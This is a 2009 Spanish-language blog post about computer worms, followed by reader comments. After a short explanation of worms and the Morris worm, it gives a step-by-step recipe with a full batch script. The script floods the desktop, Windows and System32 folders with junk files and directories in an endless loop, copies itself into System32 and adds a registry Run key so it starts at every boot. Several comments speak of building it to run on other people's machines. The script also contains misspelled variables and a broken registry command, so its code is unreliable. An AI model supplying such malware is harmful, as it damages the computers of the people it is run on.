Gusanos

abril 22, 2009 at 9:44 pm 15 comentarios

gusano1

Si alguna vez te preguntaste ‘qué es un gusano informatico?’, para empezar podés saber que un gusano es considerado una subclase de virus debido a su diseño, y pertenece al grupo de malware*1 [código maligno],  la misión principal que tienen es reproducirse, para luego propagarse dentro del sistema.   Una característica básica de los gusanos es que pueden propagarse por sí mismos.   Los gusanos suelen causar problemas, pero esto no se debe a que infecten el sistema, sino a que consumen los recursos del mismo;  por ejemplo en cuanto al internet, se ve afectado porque el gusano se encarga de consumir el ancho de banda, no porque haya infectado algun programa, también suelen consumir la memoria,  e incluso saturar y bloquear tanto una computadora, como sitios web.

ameba“El primer gusano informático de la historia data de 1988, cuando el gusano Morris infectó una gran parte de los servidores existentes hasta esa fecha. Su creador, Robert Tappan Morris, fue sentenciado a tres años de libertad condicional, 400 horas de servicios a la comunidad y una multa de USD 10050. Fue este hecho el que alentó a las principales empresas involucradas en la seguridad de tecnologías de la información a desarrollar los primeros firewalls*2.”[Ref.: Wiki]

¿Cómo se transmiten?

La mayoría de gusanos ingresan a nuestro sistema a travez de correos electrónicos, imágenes, archivos de texto, etc.  Por lo que no deben abrirse archivos que tengan procedencia ó remitentes desconocidos.

En ataques de gusano recientes, como el del gusano Blaster Worm, el gusano está diseñado para hacer un túnel en tu sistema y permitir que usuarios malévolos controlen remotamente tu ordenador.[masadelante.com]

¿Cómo crear un gusano en batch?

Encontré muchas formas en internet, hoy en día casi cualquier persona puede crear su porpio gusano :D   , una de las más simples a continuación:

Primero se utiliza el siguiente código, el cual se manipulará en un block de notas:

@echo off
:worm
cd \
cd %homepatch%
cd escritorio
echo worm >> %ramdom%.exe
echo worm >> %ramdom%.exe
echo worm >> %ramdom%.exe
echo worm >> %ramdom%.exe
echo worm >> %ramdom%.exe
echo worm >> %ramdom%.exe
echo worm >> %ramdom%.exe
echo worm >> %ramdom%.exe
echo worm >> %ramdom%.exe
echo worm >> %ramdom%.exe
cd \
cd windows
mkdir %ramdom%
mkdir %ramdom%
mkdir %ramdom%
mkdir %ramdom%
mkdir %ramdom%
mkdir %ramdom%
mkdir %ramdom%
mkdir %ramdom%
mkdir %ramdom%
mkdir %ramdom%
echo worm >> %ramdom%.exe
echo worm >> %ramdom%.exe
echo worm >> %ramdom%.exe
echo worm >> %ramdom%.exe
echo worm >> %ramdom%.exe
echo worm >> %ramdom%.exe
echo worm >> %ramdom%.exe
echo worm >> %ramdom%.exe
echo worm >> %ramdom%.exe
echo worm >> %ramdom%.exe
cd system32
mkdir %ramdom%
mkdir %ramdom%
mkdir %ramdom%
mkdir %ramdom%
mkdir %ramdom%
mkdir %ramdom%
mkdir %ramdom%
mkdir %ramdom%
mkdir %ramdom%
mkdir %ramdom%
echo worm >> %ramdom%.exe
echo worm >> %ramdom%.exe
echo worm >> %ramdom%.exe
echo worm >> %ramdom%.exe
echo worm >> %ramdom%.exe
echo worm >> %ramdom%.exe
echo worm >> %ramdom%.exe
echo worm >> %ramdom%.exe
echo worm >> %ramdom%.exe
echo worm >> %ramdom%.exe
goto worm

…Una vez realizado lo anterior, se ‘guarda como…’ el block de notas en donde se creo el gusanito, nombre: worm.bat [se utiliza esa extensión para que ejecute los comandos guardados en el archivo, desde consola], tipo: todos los archivos.    Una vez guardado, falta aún agragarle una líne de registro debajo de la instrucción @echo off, lo anterior para que el gusano se ejecute cuando el equipo inicie:

copy %0 %windir%\system32\worm.bat
REG ADD
HKLM\software\microsoft\windows\currentsversion\run/v hack/d %windir%\system32\worm.bat

Con lo anterior ya tenemos el gusano creado y listo para ejecutarlo cada vez que se inicie el sistema, el gusano se autocopiará en el directorio C:\Windows\System32\worm.bat [WarmAutor: DarkMaNats, http://www.tuwebdeinformatica.com ]Una recomendación de autor ‘No lo ejecuten porque se auto infectaran‘😛

gusano2

*1Malware:   Es software que tiene como objetivo infiltrarse en el sistema y dañar la computadora sin el conocimiento de su dueño [Ref.: mssimplex.com]

*2Firewall:  Elemento de hardware o software que se utiliza en una red de computadoras para controlar las comunicaciones, permitiéndolas o prohibiéndolas según las políticas de red que haya definido la organización responsable de la red.[Ref.: mssimplex.com]

Entry filed under: General. Tags: , , , , , .

Comandos útiles :P Festival Latinoamericano de Instalación de Software Libre

15 comentarios Add your own

  • 1. feryac  |  abril 22, 2009 a las 10:02 pm

    :O ve pues Bea que chilero tu post, pero creo que me andare mas cuidado con las cosas y links que me andas pasando😄 muy bien explicado, imaginate para que yo lo haya entendido😀 pero bueno creo que si ando en ubuntu los .exe se quedan un poquito fuera de contexto jeje, gracias Bea buena info (y)

    Responder
  • 2. b3@  |  abril 22, 2009 a las 10:07 pm

    @feryac: jajajajaja yo no te paso gusanos!!!😦
    que bueno q te gustó y que logre explicarte jeje🙂

    Responder
  • 3. Many  |  abril 22, 2009 a las 10:23 pm

    inches gusanos!!! jajajaja…vieron todo por usar win ……lol……

    Responder
  • 4. Yuri  |  abril 22, 2009 a las 10:28 pm

    buen post be@, e interesante para los mortales que usamos win, mas para mi paranoia!! jajaja

    Responder
  • 5. Ruben  |  abril 22, 2009 a las 10:30 pm

    Actualmente los virus como los gusanos, representan un gran inconveniente para nosotros, pues nuestras memorias usb se infectan facilmente y son el principal medio de propagación de virus.

    Responder
  • 6. EliAbd  |  abril 22, 2009 a las 11:59 pm

    Hubieras puesto de titulo: “Haga un Gusano en 30 segundos”,😄, regresando a la realiadad, que facil es crear uno, y que interesante, no sabia que por archivos tan comunes como imagenes se puede enviar un gusano y uno ni encuenta,

    Responder
  • 7. chentex  |  abril 23, 2009 a las 12:53 am

    los worms son bonitos!!!! son faciles de hacer… y si la gente no tiene antivirus, con un poco de estaganografia y la gente cae… me disculpo por haber apagado las computadoras!

    Responder
  • 8. Hablando de gusanos « Otro blog que aparenta ser original  |  abril 23, 2009 a las 8:56 am

    […] empezando aqui va esto, ayer precisamente Bea publico un buen articulo en su blog hablando de los gusanos y precisamente unos cuantos minutos despues de haber leido ese post me sucedio algo interesante, […]

    Responder
  • 9. Mario  |  abril 23, 2009 a las 10:50 am

    Vaya que facil es crear uno, ya hice el mio y vamos a probarlo, claro no en mi maquina😀.
    Con esto es otra razon mas para utilizar sistemas Unix-based, ya que queda claro la gran facilidad para corromper Wind2.
    Buen Post Bea!!!

    Responder
  • 10. gersoft  |  abril 24, 2009 a las 7:47 pm

    Interesante el código del gusano, es lo mismo que hacen esos gusanos que se propagan mediante las memorias USB con nombres aleatorios. Este código veo que crea copias de sí mismo en las carpetas del sistema de Windows, solo allí nos podemos dar cuenta lo sencillo que les resulta a los gusanos meterse “hasta la cocina” jejeje.

    Responder
  • 11. b3@  |  abril 25, 2009 a las 7:02 pm

    @gersoft: exacto!!! esa es la funcion de este pequeño gusanito😛
    y eso sucede cuanto uno mete su usb en el cafe del T3 jajajajaja, traes a tu usb troyanos, gusanos, virus y cuanta cosa infecciosa y dañina exista jajajajajaja

    Responder
  • 12. sandunguero  |  mayo 6, 2009 a las 9:05 pm

    interesante post, gracias por la info, sera de “gran utilidad” jaja

    y apoyo lo q dice @eliabd ““Haga un Gusano en 30 segundos”

    Responder
  • 13. b3@  |  mayo 8, 2009 a las 2:45 pm

    @sandunguero: gracias saulinto!, creo q me equivoque de titulo no? jajajaj😉

    Responder
  • 14. ppedrodom  |  mayo 17, 2009 a las 5:39 pm

    Muy buen manejo del post y sobre todo con el ejemplo practico😀. Te falto el uso de referencias y los links para aprender/conocer mas del tema.

    Responder
  • 15. carola  |  abril 8, 2010 a las 6:03 am

    vaya que interesante, pasando por aca xq casualmente me infectaron la compu dos de estos vichos “AUTORUN.INF y RECYCLE” pero gracias a la informacion de los blogs ya los elimine. besos chau!

    Responder

Responder

Introduce tus datos o haz clic en un icono para iniciar sesión:

Logo de WordPress.com

Estás comentando usando tu cuenta de WordPress.com. Cerrar sesión / Cambiar )

Imagen de Twitter

Estás comentando usando tu cuenta de Twitter. Cerrar sesión / Cambiar )

Foto de Facebook

Estás comentando usando tu cuenta de Facebook. Cerrar sesión / Cambiar )

Google+ photo

Estás comentando usando tu cuenta de Google+. Cerrar sesión / Cambiar )

Conectando a %s

Trackback this post  |  Subscribe to the comments via RSS Feed


abril 2009
L M X J V S D
« Mar   May »
 12345
6789101112
13141516171819
20212223242526
27282930  

Lo que se ha dicho

Cesar on Conectar Java + SQL Serve…
Angel on Conectar Java + SQL Serve…
eliezer palacios on Conectar Java + SQL Serve…
carola on Gusanos
kr105 on El Don

  • 108,761 hits
Creative Commons License
Esta obra está bajo una licencia de Creative Commons.

A %d blogueros les gusta esto: